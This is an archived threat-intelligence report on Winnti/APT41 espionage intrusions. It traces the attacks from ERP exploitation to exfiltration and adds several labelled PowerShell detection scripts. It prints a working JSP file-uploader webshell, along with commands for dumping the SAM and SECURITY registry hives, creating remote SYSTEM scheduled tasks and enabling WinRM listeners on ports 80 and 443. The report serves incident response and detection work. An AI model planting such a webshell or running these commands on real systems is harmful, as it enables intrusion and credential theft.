{
	"id": "ded76cc6-a452-4369-8f68-16e05eabffa0",
	"created_at": "2026-04-06T03:37:21.104077Z",
	"updated_at": "2026-04-10T13:11:40.223208Z",
	"deleted_at": null,
	"sha1_hash": "2f4421953eab17da7490549a7d745b2e228c0bd0",
	"title": "Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 793464,
	"plain_text": "Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-06 02:53:12 UTC\r\nIn 2021, the Cybereason Nocturnus Incident Response Team investigated multiple intrusions targeting technology and manufacturing companies located in Asia, Europe and North America. Based on the findings of our investigation, it appears that the goal behind these intrusions was to steal sensitive intellectual property for cyber espionage purposes.\r\nCybereason assesses with moderate-to-high confidence that the threat actor behind the intrusions is the Winnti Group (also tracked as APT41, Blackfly and BARIUM), one of the most advanced and elusive APT groups, known to operate on behalf of Chinese state interests and whose members have been indicted by the US Department of Justice for serious computer crimes.\r\nPart 1 of this research offers a unique glimpse into the Winnti intrusion playbook, covering the techniques that were used by the group from initial compromise to data exfiltration, as observed and analyzed by the Cybereason IR Team. Part 2 will offer a deep-dive analysis of the group’s tools and unique malware, including newly discovered, previously undocumented Winnti malware.\r\nKey Findings\r\nMulti-year Cyber Espionage Intrusions: The Cybereason IR team investigated a sophisticated and elusive cyber espionage operation that had remained undetected since at least 2019, with the goal of stealing sensitive proprietary information from technology and manufacturing companies, mainly in East Asia, Western Europe and North America.
\r\nNewly Discovered Malware and Multi-Stage Infection Chain: Part 2 of the research examines both known and previously undocumented Winnti malware, which included digitally signed kernel-level rootkits as well as an elaborate multi-stage infection chain that enabled the operation to remain undetected since at least 2019.\r\nWinnti APT Group: Cybereason assesses with moderate-to-high confidence that the threat actor behind the set of intrusions is the Winnti Group, a Chinese state-sponsored APT group known for its stealth, sophistication and a focus on stealing technology.\r\nThe Winnti Playbook: This research offers a unique glimpse into the Winnti intrusion playbook, detailing the most frequently used tactics, as well as some lesser-known evasive techniques that were observed during the investigation.\r\nThe Winnti Attack Lifecycle\r\nDuring 2021, Cybereason Nocturnus investigated an elaborate espionage operation targeting a number of prominent organizations in Asia, Europe and North America. Cybereason attributes this operation with moderate-to-high confidence to the Winnti APT group (also known as APT41, BARIUM, and Blackfly), a Chinese state-sponsored APT that has been active since at least 2010.\r\nFor years, this operation remained under the radar, concealing a multi-layered attack scheme with a wide and quite comprehensive toolbox. The following flow chart summarizes the group’s attack life cycle in this operation:\r\nhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques\r\nPage 1 of 16\r\nThe attackers’ initial foothold in the organization originated from multiple vulnerabilities in the organizational ERP (Enterprise Resource Planning) platform. From there, the attackers installed persistence in the form of a WebShell and began conducting reconnaissance and credential dumping, enabling them to move laterally in the network.
Ultimately, it allowed the attackers to steal highly sensitive information from critical servers and endpoints belonging to high-profile stakeholders.\r\nAnalysis of the data available to Cybereason suggests that the operation was focused on cyber espionage, with the aim of stealing proprietary information, R\u0026D documents, source code and blueprints for various technologies.\r\nThe attackers managed to go undetected for years by using stealthy techniques combined with state-of-the-art attack and espionage tools, which included advanced rootkits.\r\nInitial Compromise\r\nAccording to the Cybereason IR investigation, the infection vector used to compromise Winnti targets was the exploitation of a popular ERP solution leveraging multiple vulnerabilities, some known and some that were unknown at the time of the exploitation.\r\nOne of the first actions taken after a successful exploit was an attempt to find a specific DLL file under the VMware Tools folder, gthread-3.6.dll. The DLL is invoked by the intermediate dropper, and its role is to inject the payload into svchost.exe on the targeted system. This TTP has been observed before and is known to be characteristic of the Winnti group:\r\ndir \"C:\\Program Files\\VMware\\VMware Tools\\gthread-3.6.dll\"\r\nCommand line to search for the DLL file\r\nSearching for this DLL could suggest that the attackers had already compromised that environment in the past, or that they were attempting to avoid re-infecting endpoints they had already compromised. Any gthread-3.6.dll found in that folder should therefore be checked for a valid Authenticode signature and a known-good hash rather than trusted on its name and location.\r\nPersistence\r\nThe Cybereason Nocturnus IR team observed multiple persistence techniques used by Winnti over the course of the intrusion.
While some techniques are quite trivial and well-known, some are rare and advanced, and only a handful of threat actors are known to have used them before.\r\nPersistence Technique #1: WebShell\r\nThe first foothold on “patient zero” was established by using an RCE exploit to place a minimal JSP WebShell under the ERP web application server directory, in three steps:\r\nThe attackers dropped an encoded VBScript version of the WebShell to the %UserProfile% directory of the ERP web service account.\r\nOnce the dropper was written to disk, they executed the encoded VBScript file using wscript and wrote the decoded output to a text file.\r\nThe final step was copying the output text file to a folder that is accessible externally via the ERP web service and changing the extension to .jsp so it would act as a WebShell:\r\n\u003c%\r\nif(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.getRealPath(\"\\\\\")+request.getParameter(\"f\"))).write(request.getParameter(\"t\").getBytes());\r\n%\u003e\r\nA sample file uploader dropped by the threat actor. It writes the raw value of the t request parameter to a file named by the f parameter, relative to the web application root, so any further file (including a command-execution WebShell) can be planted with a single HTTP request.\r\nIt is interesting to note that the above code has been known since at least August 2006, and has been published on several Chinese hacking websites, as well as in GitHub repositories owned by Chinese-speaking users, introducing this code as a one-liner for trojan or backdoor uploads:\r\nJSP code snippet search results on Google\r\nMultiple instances of such .jsp files were found on ERP servers. Based on the analysis of the source files found in our searches, we determined that the aforementioned WebShell was almost identical to a publicly known WebShell called up_win32.jsp.
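The following PowerShell script is an added example and is not code from the Cybereason report. It hunts an ERP web root for JSP files carrying the primitives the uploader above relies on (a request parameter feeding a file write or a process launch, and a path built from the web application root), and it builds a throwaway sample web root so it can be run offline. The indicator regexes, the size and age thresholds, and the sample file names are assumptions made for illustration.

```powershell
# Added example, not code from the Cybereason report: hunt for JSP upload/command
# shells of the kind shown above in an ERP web root. The indicator regexes, the
# size/age filters and the sample files are assumptions made for illustration.
function Find-JspWebShell {
    param(
        [Parameter(Mandatory)][string]$WebRoot,
        [int]$MaxSizeKB = 64,        # one-liner shells are tiny; skip full application pages
        [int]$NewerThanDays = 3650   # tighten to the suspected intrusion window when known
    )
    # Match the primitives a JSP shell needs (a request parameter feeding a file write
    # or a process launch), not a known file name, which the attacker can change freely.
    $indicators = [ordered]@{
        ParamToFileWrite = 'request\\.getParameter\\([^)]*\\).{0,200}FileOutputStream|FileOutputStream.{0,200}request\\.getParameter'
        ParamToExec      = 'Runtime\\.getRuntime\\(\\)\\.exec\\(|ProcessBuilder\\('
        WebRootPathBuild = 'application\\.getRealPath\\('
        DecodeStage      = 'Base64|new\\s+String\\(.{0,40}decode'
    }
    $cutoff = (Get-Date).AddDays(-$NewerThanDays)
    Get-ChildItem -Path $WebRoot -Recurse -File -Include *.jsp, *.jspx -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -le ($MaxSizeKB * 1KB) -and $_.CreationTime -ge $cutoff } |
        ForEach-Object {
            $text = Get-Content -Path $_.FullName -Raw -ErrorAction SilentlyContinue
            if (-not $text) { return }
            $hits = @(foreach ($name in $indicators.Keys) { if ($text -match $indicators[$name]) { $name } })
            if ($hits.Count -eq 0) { return }
            # Two independent primitives (parameter-driven file write plus a web-root path) is a
            # strong signal; a single hit also occurs in legitimate upload handlers and needs review.
            [pscustomobject]@{
                Path       = $_.FullName
                SizeBytes  = $_.Length
                Created    = $_.CreationTime
                Owner      = (Get-Acl -Path $_.FullName).Owner
                Indicators = ($hits -join ',')
                Score      = $hits.Count
            }
        } | Sort-Object Score -Descending
}

# --- Constructed sample web root in a throwaway temp directory (assumption) ---
$root = Join-Path ([IO.Path]::GetTempPath()) ('erp-webroot-' + [guid]::NewGuid().ToString('N'))
New-Item -ItemType Directory -Path (Join-Path $root 'css') -Force | Out-Null
# Benign page: reads a parameter but never touches the file system or starts a process.
Set-Content -Path (Join-Path $root 'index.jsp') -Value '<h1><%= request.getParameter(\"lang\") %></h1>'
# Uploader equivalent to the one-liner quoted above, dropped under a static-content folder.
Set-Content -Path (Join-Path $root 'css\\up.jsp') -Value '<% if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.getRealPath(\"\\\\\")+request.getParameter(\"f\"))).write(request.getParameter(\"t\").getBytes()); %>'

Find-JspWebShell -WebRoot $root | Format-Table -AutoSize
Remove-Item -Path $root -Recurse -Force
```

The scan is best paired with process telemetry of the drop chain described above: a wscript.exe or cscript.exe launched by the ERP application server's service account, followed by a new .jsp file appearing under a static-content directory, and the file's owner (which the script reports) will typically be that service account rather than the account used for legitimate deployments.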
Moreover, we found another WebShell named css.jsp, which has similarities to the code of another publicly known WebShell called cmd_win32.jsp:\r\nERP exploitation process tree as seen in the Cybereason XDR Platform\r\nAfter establishing a WebShell-based foothold, the attackers shifted their focus to internal reconnaissance and lateral movement efforts. This is not the first time Winnti has used WebShells as a foothold tactic; in March 2021, ESET published a report naming Winnti as one of the groups that targeted Exchange servers and deployed WebShells on the compromised systems.\r\nPersistence Technique #2: WinRM over HTTP/HTTPS\r\nThe Cybereason Nocturnus \u0026 IR Team investigation also revealed a second persistence mechanism that granted the attackers an additional backup entry point: enabling the native Windows feature WinRM over HTTP/HTTPS on the compromised servers.\r\nWinRM is the native Windows remote management protocol (WS-Management over HTTP) that provides remote shell access. By default it listens on TCP 5985 (HTTP) and 5986 (HTTPS); the “compatibility” listeners additionally accept WinRM traffic on port 80 (HTTP) and port 443 (HTTPS), the ports an ERP web server is already expected to expose, so the traffic blends in with normal web traffic and is rarely blocked. These settings are changed through the WinRM Scripting API, which the legitimate Visual Basic script Winrm.vbs wraps.
\r\nThe attackers executed cscript.exe to modify the system’s WinRM configuration, setting EnableCompatibilityHttpListener and EnableCompatibilityHttpsListener to True. This enabled HTTP and HTTPS listeners for remote shell access on ports 80 and 443 and gave them another route back into the host, provided they still held valid credentials for it. The cscript command line used to enable the HTTPS listener (the HTTP listener is enabled with the same command and the EnableCompatibilityHttpListener key) was:\r\ncscript //nologo \"C:\\Windows\\System32\\winrm.vbs\" set winrm/config/service @{EnableCompatibilityHttpsListener=\"true\"}\r\nModifying system WinRM configuration using cscript.exe as seen in the Cybereason XDR Platform\r\nPersistence Technique #3: Loading a Signed Kernel Rootkit\r\nThe attackers leveraged a signed kernel rootkit to establish an additional persistence mechanism. Detailed analysis of this stealthy rootkit will be provided in part 2 of this research series, which offers a deep dive into the Winnti malware arsenal.\r\nPersistence Technique #4: Windows Service\r\nThe attackers abused the legitimate IKEEXT and PrintNotify Windows services to side-load Winnti DLLs and preserve persistence.
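The following PowerShell is an added example, not code from the report. It reads back the WinRM settings that winrm.vbs changes (and the active listeners), provides the matching remediation, and lists the DLLs loaded by the IKEEXT and PrintNotify service hosts, together with each service's registered ServiceDll, that are unsigned, not Microsoft-signed, or located outside the Windows directory. Run it in an elevated session. The service names come from the text above; the signer and location rules are assumptions and should be replaced by a per-build baseline where one exists.

```powershell
# Added example, not code from the Cybereason report: audit a host for the two
# persistence mechanisms described above, the WinRM compatibility listeners
# (technique #2) and the DLLs loaded by the IKEEXT and PrintNotify service hosts
# (technique #4). Run in an elevated session. The service names come from the
# text; the 'not signed by Microsoft' and 'outside the Windows directory' rules
# are assumptions to be replaced by a per-build baseline where one exists.

function Get-WinRmCompatListenerState {
    # winrm.vbs edits the same settings the WSMan: drive exposes, so read them back here.
    # Defaults: both compatibility flags false. WinRM itself listens on 5985/5986;
    # the compatibility listeners additionally bind 80/443.
    $svc = Get-ChildItem -Path WSMan:\\localhost\\Service -ErrorAction Stop
    $listeners = Get-ChildItem -Path WSMan:\\localhost\\Listener | ForEach-Object {
        $l = Get-ChildItem -Path $_.PSPath
        '{0}:{1}' -f ($l | Where-Object Name -eq 'Transport').Value, ($l | Where-Object Name -eq 'Port').Value
    }
    [pscustomobject]@{
        EnableCompatibilityHttpListener  = ($svc | Where-Object Name -eq 'EnableCompatibilityHttpListener').Value
        EnableCompatibilityHttpsListener = ($svc | Where-Object Name -eq 'EnableCompatibilityHttpsListener').Value
        Listeners                        = ($listeners -join ', ')
    }
}

function Disable-WinRmCompatListeners {
    # Remediation: turn the compatibility listeners back off; the normal WinRM listeners are untouched.
    Set-Item -Path WSMan:\\localhost\\Service\\EnableCompatibilityHttpListener  -Value $false
    Set-Item -Path WSMan:\\localhost\\Service\\EnableCompatibilityHttpsListener -Value $false
}

function Get-ServiceHostSuspiciousModules {
    param([string[]]$ServiceName = @('IKEEXT', 'PrintNotify'))
    foreach ($name in $ServiceName) {
        $svc = Get-CimInstance -ClassName Win32_Service -Filter \"Name='$name'\"
        if (-not $svc) { continue }
        # ServiceDll is what svchost.exe loads for the service; check it even when the service is stopped.
        $params = Get-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\$name\\Parameters\" -ErrorAction SilentlyContinue
        $paths = @()
        if ($params.ServiceDll) { $paths += [Environment]::ExpandEnvironmentVariables($params.ServiceDll) }
        if ($svc.ProcessId -gt 0) {
            $paths += @((Get-Process -Id $svc.ProcessId -ErrorAction SilentlyContinue).Modules | ForEach-Object FileName)
        }
        foreach ($p in ($paths | Where-Object { $_ -and (Test-Path -LiteralPath $_) } | Select-Object -Unique)) {
            # A side-loaded DLL is unsigned, signed by someone other than Microsoft, or lives
            # outside the Windows directory. A Valid status alone proves little: the report's
            # rootkit (technique #3) was signed.
            $sig = Get-AuthenticodeSignature -FilePath $p
            if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notmatch 'Microsoft' -or $p -notmatch '^[A-Za-z]:\\\\Windows\\\\') {
                [pscustomobject]@{
                    Service   = $name
                    State     = $svc.State
                    Path      = $p
                    SigStatus = $sig.Status
                    Signer    = $sig.SignerCertificate.Subject
                }
            }
        }
    }
}

Get-WinRmCompatListenerState | Format-List
Get-ServiceHostSuspiciousModules | Format-Table -AutoSize
```

Because the rootkit in technique #3 was itself signed, a Valid signature status is not a clean bill of health; the useful signals are a non-Microsoft signer, a ServiceDll or loaded module outside the Windows directory, or a module with no counterpart on a known-good build of the same Windows version. Catalog-signed system files report Valid only on builds where Get-AuthenticodeSignature consults the catalog, so expect some noise on older hosts.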
A full analysis of this service-based DLL side-loading will also be provided in part 2 of the research.\r\nReconnaissance\r\nInitial Reconnaissance\r\nUpon gaining access to the Windows ERP server, Winnti used the following commands:\r\ncat /etc/hosts\r\nroute print\r\nThe nature of these commands suggests they may have been part of an automated exploitation or vulnerability discovery process: the ERP server is a Windows server, and cat /etc/hosts is a Unix command that simply fails there, as one would expect from tooling that runs the same post-exploitation probe regardless of the target platform.\r\nAfter these commands were executed, the attackers began more dedicated reconnaissance, using built-in Windows commands to gather information on the compromised server and rounding out the initial reconnaissance phase:\r\nsysteminfo\r\nnet start\r\nnet user\r\ndir c:\\\r\nAdvanced Stages Reconnaissance\r\nAfter establishing a foothold on multiple machines in the network, Winnti began leveraging Scheduled Tasks to execute batch scripts named “cc.bat” or “bc.bat”. The content of these batch files varied from one machine to another, each time containing different reconnaissance commands based on the attackers’ goals.
Examples of this type of reconnaissance command, with the discovery technique each serves, are as follows:\r\nCommand                 Technique\r\nfsutil fsinfo drives    System Drives Discovery\r\nipconfig                System Network Configuration Discovery\r\nnbtstat                 Remote System Discovery\r\nnet accounts            Password Policy Discovery\r\nnet group               Permission Groups Discovery\r\nnet session             System Network Session Discovery\r\nnet share               Network Share Discovery\r\nnet start               System Service Discovery\r\nnet time                System Time Discovery\r\nnet use                 System Network Connections Discovery\r\nnet user                Account Discovery\r\nnet view                Network Share Discovery\r\nnetstat                 System Network Connections Discovery\r\nnslookup                System DNS Configuration Discovery\r\nping                    Remote System Discovery\r\nquery user              System Owner/User Discovery\r\nsysteminfo              System Information Discovery\r\ntasklist                Process Discovery\r\ntracert                 Remote System Route Discovery\r\nwhoami                  Logged On User Discovery\r\nWhen the attackers gained access to a desired domain environment, they started gathering information about the domain, again using built-in Windows commands. In this phase, the Cybereason Nocturnus IR team observed additional queries for users in administrative groups along with execution of the dsquery and dsget commands.
The attackers then compressed the collected information using makecab.exe and exfiltrated it to their servers.\r\nCredential Dumping\r\nDuring the attack, Cybereason Nocturnus observed two methods used for credential dumping: the first used the well-known reg save command, and the second was a previously unknown tool named MFSDLL.exe.\r\nUsing the reg save command, the attackers attempted to dump the SYSTEM, SAM and SECURITY registry hives as follows:\r\nreg save HKLM\\SYSTEM system.hiv\r\nreg save HKLM\\SAM sam.hiv\r\nreg save HKLM\\SECURITY security.hiv\r\nThe SAM hive holds the local account NTLM hashes and the SECURITY hive holds cached domain credentials and LSA secrets, both encrypted with a key derived from the SYSTEM hive; taking all three together therefore allowed the attackers to extract and crack the password hashes offline. Saving these hives requires administrative rights, and the resulting .hiv files in an unusual directory are themselves a reliable indicator.\r\nThe second tool used by the attackers to dump credentials was a previously undocumented executable named MFSDLL.exe. At the time of the investigation, Cybereason was not able to recover a copy of it to examine its content. Nevertheless, the Cybereason XDR solution managed to detect how this file was used as well as what it loaded.
The attackers used this tool in the following manner:\r\nMFSDLL.exe \u003c12 characters string\u003e \u003cfile\u003e \u003cparameter\u003e (for example: MFSDLL.exe \u003c12 characters string\u003e 1.log dump)\r\nThe variations it was found to be used with were:\r\nMFSDLL.exe \u003c12 characters string\u003e \u003cfile_name\u003e.log domain\r\nMFSDLL.exe \u003c12 characters string\u003e \u003cfile_name\u003e.log dump\r\nMFSDLL.exe \u003c12 characters string\u003e \u003cfile_name\u003e.log password\r\nMFSDLL.exe \u003c12 characters string\u003e \u003cfile_name\u003e.log sam\r\nMFSDLL.exe \u003c12 characters string\u003e \u003cfile_name\u003e.log minidump\r\nBecause the binary itself was not recovered, this command-line shape (a fixed-length token, a .log argument and a dump/sam/minidump-style verb) is the most usable detection artifact for it.\r\nThe Nocturnus IR team also observed the loading of a DLL file called mktzx64.dll along with the sam command execution. The name of this DLL was mentioned in a report by ESET detailing an espionage campaign in Asia linked to China, and it suggests the use of Mimikatz, a popular credential dumping tool.\r\nThis manner of execution resembles ACEHASH, a credential theft and password dumping utility leveraged by the Winnti group in the past, using commands such as “c64.exe f64.data \"9839D7F1A0 -m”:\r\nMFSDLL.exe executions as seen in the Cybereason XDR Platform\r\nLateral Movement\r\nFor lateral movement, the attackers used the Windows-native schtasks command to create remote scheduled tasks and to execute malicious code through the aforementioned batch files:\r\nSCHTASKS /Create /S \u003cIP Address\u003e /U \u003cUsername\u003e /p \u003cPassword\u003e /SC ONCE /TN test /TR \u003cPath to a Batch File\u003e /ST \u003cTime\u003e /RU SYSTEM\r\nThe scheduled task command line used for lateral movement. /S names the remote host, /U and /p supply the credentials used to register the task, /SC ONCE with /ST schedules a single run, and /RU SYSTEM makes the batch file run as the local SYSTEM account on the target, so no interactive logon is needed there.\r\nThe scheduled tasks the attackers created were all named test and were created using compromised Domain Administrator credentials.
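The following PowerShell is an added example, not code from the report. It implements five command-line rules for the activity described above (reg save of the credential hives, remote schtasks creation running as SYSTEM, cscript turning on the WinRM compatibility listeners, a process named like a Windows binary whose PE OriginalFileName says otherwise, which is the case of the report's WinRAR renamed to rundll32.exe, and the MFSDLL argument shape), plus a burst detector for the batch-driven discovery commands, and runs them over constructed Sysmon-style process-creation records. Host names, process IDs, command lines and file names are invented; field names follow Sysmon Event ID 1.

```powershell
# Added example, not code from the Cybereason report: command-line detection logic
# for the reconnaissance, credential-dumping and lateral-movement activity described
# above, and for tools masquerading under Windows binary names (the report's WinRAR
# renamed to rundll32.exe), run over constructed Sysmon-style process-creation records.
# Field names follow Sysmon Event ID 1; hosts, users, paths and values are invented.

# Discovery commands from the table above (two-word forms first, then one-word forms).
$discoveryVerbs = 'fsutil fsinfo', 'net accounts', 'net group', 'net session', 'net share', 'net start',
                  'net time', 'net use', 'net user', 'net view', 'query user', 'ipconfig', 'nbtstat',
                  'netstat', 'nslookup', 'ping', 'systeminfo', 'tasklist', 'tracert', 'whoami', 'dsquery', 'dsget'

function Test-Event {
    param([pscustomobject]$E)
    $cl = $E.CommandLine; $img = $E.Image; $alerts = @()
    # Registry hives holding credential material saved with reg.exe.
    if ($img -match '\\\\reg\\.exe$' -and $cl -match '\\bsave\\b.*\\bHKLM\\\\(SAM|SECURITY|SYSTEM)\\b') {
        $alerts += 'RegSaveCredentialHive'
    }
    # Remote scheduled task registered with explicit credentials and run as SYSTEM.
    if ($img -match '\\\\schtasks\\.exe$' -and $cl -match '/create\\b.*/s\\s+\\S+.*/ru\\s+system\\b') {
        $alerts += 'RemoteSchtasksAsSystem'
    }
    # winrm.vbs used to switch on the port 80/443 compatibility listeners.
    if ($img -match '\\\\cscript\\.exe$' -and $cl -match 'winrm\\.vbs.*EnableCompatibilityHttps?Listener') {
        $alerts += 'WinRmCompatListenerEnabled'
    }
    # Process named like a Windows system binary whose PE OriginalFileName disagrees.
    $leaf = $img -replace '^.*\\\\', ''
    if ($leaf -in @('rundll32.exe', 'svchost.exe', 'regsvr32.exe', 'lsass.exe') -and
        $E.OriginalFileName -and $E.OriginalFileName -ne $leaf) {
        $alerts += 'MasqueradingOriginalFileName'
    }
    # MFSDLL-style shape: <tool> <12-char token> <name>.log <verb>. Treating the token as any
    # 12 non-space characters is an assumption; the report does not give its alphabet.
    if ($cl -match '^\\S+\\s+\\S{12}\\s+\\S+\\.log\\s+(domain|dump|password|sam|minidump)$') {
        $alerts += 'TokenLogVerbDumperPattern'
    }
    $alerts
}

function Find-DiscoveryBurst {
    # cc.bat/bc.bat run many discovery commands from one cmd.exe within seconds; flag that shape.
    param([object[]]$Events, [int]$MinDistinct = 5, [int]$WindowSeconds = 120)
    $Events | Where-Object { $_.ParentImage -match '\\\\cmd\\.exe$' } |
        Group-Object -Property Host, ParentProcessId | ForEach-Object {
            $sorted = @($_.Group | Sort-Object UtcTime)
            $verbs = @($sorted | ForEach-Object {
                $tok = ($_.CommandLine.ToLower() -split '\\s+')
                $two = ($tok | Select-Object -First 2) -join ' '
                if ($two -in $discoveryVerbs) { $two } elseif ($tok[0] -in $discoveryVerbs) { $tok[0] }
            } | Sort-Object -Unique)
            $span = ($sorted[-1].UtcTime - $sorted[0].UtcTime).TotalSeconds
            if ($verbs.Count -ge $MinDistinct -and $span -le $WindowSeconds) {
                [pscustomobject]@{ Host = $sorted[0].Host; ParentPid = $sorted[0].ParentProcessId
                                   DistinctVerbs = $verbs.Count; Seconds = [int]$span; Verbs = ($verbs -join ',') }
            }
        }
}

# --- Constructed sample records (assumption: one ERP server, two cmd.exe parents) ---
$t0 = [datetime]'2021-06-01T02:00:00Z'
function New-Ev([int]$Sec, [string]$Image, [string]$Cmd, [string]$Orig = '', [int]$Ppid = 4120) {
    [pscustomobject]@{ UtcTime = $t0.AddSeconds($Sec); Host = 'ERP01'; ParentImage = 'C:\\Windows\\System32\\cmd.exe'
                       ParentProcessId = $Ppid; Image = $Image; CommandLine = $Cmd; OriginalFileName = $Orig }
}
$events = @(
    (New-Ev 0  'C:\\Windows\\System32\\systeminfo.exe' 'systeminfo')
    (New-Ev 2  'C:\\Windows\\System32\\net.exe'        'net user')
    (New-Ev 3  'C:\\Windows\\System32\\net.exe'        'net group \"domain admins\" /domain')
    (New-Ev 5  'C:\\Windows\\System32\\ipconfig.exe'   'ipconfig /all')
    (New-Ev 7  'C:\\Windows\\System32\\whoami.exe'     'whoami')
    (New-Ev 9  'C:\\Windows\\System32\\tasklist.exe'   'tasklist')
    (New-Ev 40 'C:\\Windows\\System32\\reg.exe'        'reg save HKLM\\SAM sam.hiv' '' 5200)
    (New-Ev 60 'C:\\Windows\\System32\\schtasks.exe'   'SCHTASKS /Create /S 10.0.0.25 /U corp\\adm /p Pw /SC ONCE /TN test /TR C:\\Windows\\Temp\\cc.bat /ST 02:10 /RU SYSTEM' '' 5200)
    (New-Ev 90 'C:\\Windows\\Temp\\rundll32.exe'       'rundll32.exe a -hpPw -r docs.rar D:\\share\\RnD' 'Rar.exe' 5200)
    (New-Ev 95 'C:\\Windows\\System32\\cscript.exe'    'cscript //nologo \"C:\\Windows\\System32\\winrm.vbs\" set winrm/config/service @{EnableCompatibilityHttpsListener=\"true\"}' '' 5200)
    (New-Ev 99 'C:\\Users\\svc_erp\\MFSDLL.exe'        'MFSDLL.exe AbCdEf123456 1.log dump' '' 5200)
)

$events | ForEach-Object { $e = $_; foreach ($rule in Test-Event $e) {
    [pscustomobject]@{ Time = $e.UtcTime.ToString('HH:mm:ss'); Rule = $rule; CommandLine = $e.CommandLine } } } | Format-Table -AutoSize
Find-DiscoveryBurst -Events $events | Format-List
```

To run this against real data, replace $events with objects built from Get-WinEvent output for Sysmon event 1, which exposes Image, CommandLine, ParentImage, ParentProcessId and OriginalFileName. The burst rule is the most portable of the set: it keys on the shape that cc.bat and bc.bat produce rather than on any single command, so it survives the attackers changing the batch file contents, which the text notes they did from machine to machine.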
The batch file the scheduled task executed was run from a temp folder under the local SYSTEM account.\r\nThe attackers used these scheduled tasks to execute commands on dozens of compromised machines throughout this stage of the attack. The batch files’ content changed from one phase of the attack to another: initially they executed reconnaissance commands, and later they were used to distribute malicious binaries.\r\nAmong the compromised machines, the attackers were able to expand their control to the Domain Controllers using the same method. Once Domain Admin credentials were obtained, the attackers were able to move laterally and infect a large number of hosts using the stolen credentials.\r\nData Collection and Exfiltration\r\nTo collect data efficiently, the attackers utilized a renamed Chinese-language version of WinRAR to create password-protected archives containing the stolen data. The WinRAR executable is the 32-bit command-line version of the legitimate WinRAR application. The executable was renamed to rundll32.exe, a legitimate Windows program, in order to disguise it and blend it in with other Windows system files. The rename leaves the file’s PE version resource and its signer unchanged, so a rundll32.exe whose original file name or publisher is not Microsoft’s, or which runs from outside the system directories, stands out to any telemetry that records those fields:\r\nThe renamed WinRAR version\r\nConclusions\r\nIn the first part of this Winnti research, we reported the discovery of multiple sets of intrusions that went undetected for years. These intrusions targeted technology and manufacturing companies in multiple regions of the world to steal sensitive information for cyber espionage purposes.\r\nBased on our analysis and the information available, we assess with moderate-to-high confidence that the attacks described in this report were carried out by the notorious Winnti APT Group, a highly sophisticated APT group operating on behalf of Chinese state interests that has been active since at least 2010.
The group has been known over the years for its focus on intellectual property theft.\r\nIn this part of the research, we offered readers a unique glimpse into the attackers’ playbook, forensically tracing the attack steps from initial compromise all the way through data exfiltration. In part 2 of this research, we will take a deep dive into the Winnti malware arsenal, analyzing the different implants and unique infection chains.\r\nAcknowledgments\r\nThis research would not have been possible without the tireless effort, analysis, attention to detail and contribution of the Cybereason Incident Response team. Special thanks and appreciation go to Matt Hart, Yusuke Shimizu, Niamh O’Connor, Jim Hung, and Omer Yampel.\r\nIndicators of Compromise\r\nDue to the sensitive nature of the attack, not all IOCs observed by Cybereason can be shared in our public report. Please contact us for more information.\r\nMITRE ATT\u0026CK BREAKDOWN\r\nReconnaissance: Gather Victim Identity Information: Credentials; Gather Victim Network Information\r\nInitial Access: Exploit Public-Facing Application; Supply Chain Compromise\r\nExecution: Scheduled Task/Job; Inter-Process Communication; Exploitation for Client Execution; Command and Scripting Interpreter: Windows Command Shell; Command and Scripting Interpreter: Visual Basic; Native API\r\nPersistence: Server Software Component: Web Shell; Hijack Execution Flow: DLL Side-Loading; Scheduled Task/Job: Scheduled Task; Valid Accounts: Domain Accounts; Valid Accounts: Local Accounts; Boot or Logon Autostart Execution: Kernel Modules and Extensions\r\nPrivilege Escalation: Create or Modify System Process: Windows Service; Process Injection: Dynamic-link Library Injection; Scheduled Task/Job: Scheduled Task; Valid Accounts: Domain Accounts; Valid Accounts: Local Accounts\r\nDefense Evasion: Hijack Execution Flow: DLL Side-Loading; Rootkit; Process Injection: Dynamic-link Library Injection; Masquerading: Match Legitimate Name or Location; Reflective Code Loading; Signed Binary Proxy Execution: Rundll32; Valid Accounts: Domain Accounts; Valid Accounts: Local Accounts\r\nCredential Access: OS Credential Dumping\r\nDiscovery: System Network Configuration Discovery; Remote System Discovery; Password Policy Discovery; Permission Groups Discovery; Network Share Discovery; System Service Discovery; System Time Discovery; System Network Connections Discovery; Account Discovery; System Owner/User Discovery; System Information Discovery; Process Discovery\r\nLateral Movement: Exploitation of Remote Services; Remote Services: Remote Desktop Protocol\r\nCollection: Archive Collected Data: Archive via Utility; Automated Collection\r\nExfiltration: Automated Exfiltration\r\nCommand and Control: Application Layer Protocol: Web Protocols; Proxy\r\nAbout the Researchers:\r\nChen Erlich\r\nChen has almost a decade of experience in Threat 
Intelligence \u0026 Research, Incident Response and Threat Hunting. Before joining Cybereason, Chen spent three years dissecting APTs, investigating underground cybercriminal groups and discovering security vulnerabilities in well-known vendors’ products. Previously, he served as a Security Researcher in the military.\r\nFusao Tanida\r\nFusao has spent over 10 years in the security industry. Before joining Cybereason, he worked as a mobile malware researcher and developer at a security vendor, and then at a global mobile phone manufacturer developing the antivirus and VPN client for its Android phones.\r\nFusao joined Cybereason in 2019 and was previously a Senior Security Analyst in the Advanced Services Team at Cybereason Japan, where he delivered various professional security services, incident response, consultation and triage of malware activity alerts in the SOC.\r\nOfir Ozer\r\nOfir is an Incident Response Engineer at Cybereason with a keen interest in Windows internals, reverse engineering, memory analysis and network anomalies. He has years of experience in cyber security, focusing on malware research, incident response and threat hunting. Ofir started his career as a Security Researcher in the military and then became a malware researcher focusing on banking Trojans.\r\nAkihiro Tomita\r\nAkihiro is the Senior Manager of Global Security Practice, leading the Incident Response team in the APAC region and Japan. Akihiro has led a substantial number of large-scale Incident Response, Digital Forensics and Compromise Assessment engagements in recent years.
